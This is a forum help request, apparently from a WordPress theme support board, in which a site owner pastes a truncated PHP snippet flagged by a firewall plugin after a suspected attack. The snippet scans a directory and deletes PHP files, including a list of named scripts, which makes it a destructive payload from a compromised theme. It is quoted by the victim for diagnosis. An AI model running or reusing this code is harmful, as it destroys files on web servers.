Help!? Hacking Attack

The Study Gurus · #1 08-24-2011, 03:49 PM

Hi, I just installed Genesis a few days ago on a new WP installation and I just got a pretty alarming email from the Wordpress Firewall plugin.

Saying there was a possible Directory Transversal Attack, with half of the following code...

Code:

code = error_reporting(0); $newline = " "; echo "@send@YES@sendend@"; unset($phpcache); $cdir = scandir("./"); foreach ($cdir as $dd) { if (preg_match("/.php/", $dd) && !preg_match("/ed59d62e1b1e2167275feed65b374079/", $dd)){ $phpcache[] = $dd; unlink($dd); } } unlink("../d.php"); unlink("../sm3.php"); unlink("../r1.php"); unlink("../wp.php"); unlink("../wp1.php"); unlink("../wp2.php"); unlink("../xf2.php"); unlink("../writeht.php"); unlink("../script_new3.php"); unlink("../stats.php"); unlink("../hn0.php"); if (isset($phpcache)){ echo "@send@Found PHP!!!

This came from "inside" a theme folder that I previously used, but has since been deleted. Ie - it's not there, yet I'm getting attacked by it.

I know that this has nothing at all to do with Genesis - I just have no idea where to start looking for a fix. I would be so incredibly grateful for some help!

Chris

Thread Tools
Show Printable Version Email this Page
Display Modes
Switch to Linear Mode Switch to Hybrid Mode Threaded Mode

Similar Threads
Thread	Thread Starter	Forum	Replies	Last Post
Hacking a bit the theme...	alan	General Discussion	4	09-19-2009 08:50 PM
Resource for hacking WP	Tina Woodall	General Discussion	2	01-02-2009 09:33 PM
Attack warning	domian	General Discussion	10	12-11-2008 09:46 AM
I am hacking a plugin and need a coder, HELP!	CarpetGuy	General Discussion	5	12-07-2008 08:18 PM